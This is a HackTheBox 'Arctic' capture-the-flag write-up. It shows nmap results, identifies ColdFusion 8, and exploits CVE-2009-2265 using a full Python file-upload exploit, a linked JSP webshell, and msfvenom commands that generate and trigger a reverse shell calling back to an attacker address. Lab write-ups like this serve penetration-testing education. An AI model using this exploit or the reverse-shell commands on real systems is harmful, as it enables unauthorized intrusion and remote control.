# HackTheBox - Arctic ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8Kr9EWOF1eV6NdciE%2Fimage.png?alt=media\&token=f56b9769-8696-4d70-92a9-a4cac3f2e463) ### Nmap scan results ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8KxOoTlrMbcLSiNRS%2Fimage.png?alt=media\&token=3433203b-cd03-4ed3-80da-5aaf617803be) {% hint style="info" %} From Wikipedia, the free encyclopedia. **Microsoft RPC** (**Microsoft** Remote Procedure Call) is a modified version of DCE/**RPC**. Additions include partial support for UCS-2 (but not Unicode) strings, implicit handles, and complex calculations in the variable-length string and structure paradigms already present in DCE/**RPC**. {% endhint %} > **Remote Procedure Call** (**RPC**) is a protocol that one program can use to request a service from a program located in another computer on a network without having to understand the network's details. **RPC** is **used to** call other processes on the remote systems like a local system. ### Identifying ColdFusion running on port 8500 ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8MDM3LRNi0H5mZ1Me%2Fimage.png?alt=media\&token=e98a859f-4ea6-4110-a41d-d3ba4e4478f3) The webserver is running ColdFusion 8 and we can check for known vulnerabilities using **searchsploit**. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8MsZCH84HwL6Xvegl%2Fimage.png?alt=media\&token=697d52ea-12dc-4faa-973f-7c4af3f4c810) ### Exploiting ColdFusion's Arbitrary File Upload We can try `Arbitrary File Upload module`, as we are not interested in exploiting Cross Site Scripting. References: ```python # Exploit Author: Alexander Reid # Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html # Version: ColdFusion 8.0.1 # CVE: CVE-2009-2265 # # Description: # A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1 # Uploads the specified jsp file to the remote server. # # Usage: ./exploit.py [/path/to/coldfusion] # Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp import requests, sys try: ip = sys.argv[1] port = sys.argv[2] if len(sys.argv) == 5: path = sys.argv[3] with open(sys.argv[4], 'r') as payload: body=payload.read() else: path = "" with open(sys.argv[3], 'r') as payload: body=payload.read() except IndexError: print 'Usage: ./exploit.py [/path/to/coldfusion] ' print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp' sys.exit(-1) basepath = "http://" + ip + ":" + port + path print 'Sending payload...' try: req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/cmd.jsp%00", files={'newfile': ('exploit2.txt', body, 'application/x-java-archive')}, timeout=90) if req.status_code == 200: print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/cmd.jsp' else: print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason except requests.Timeout: print 'Failed to upload payload... Request timed out' ``` Let's upload a cmd.jsp file. You can get the `cmd.jsp` file from [here](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmd.jsp). ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8SMMfZFEuR86HeWu2%2Fimage.png?alt=media\&token=6df36447-e238-4500-9d8f-0aa248121bd6) The webserver is taking a lot of time to process a single request. So it might take some time for uploading the payload. After the webshell gets uploaded, we can try a simple command to test it out. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8SgYmQ61yPhiSvHod%2Fimage.png?alt=media\&token=e125c915-3cb5-404b-9574-4a347c064223) ### Generating JSP Reverse Shell using MSFVenom Now I will upload a reverse shell instead of running commands on the webshell, as it takes a hell lot of time. ```python msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw > shell.jsp python exploit.py 10.10.10.11 8500 shell.jsp curl http://10.10.10.11:8500/userfiles/file/reverse.jsp ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8Upi90gDc7VuJsytw%2Fimage.png?alt=media\&token=09dab123-8fe4-47da-a407-c0e8f19026d0)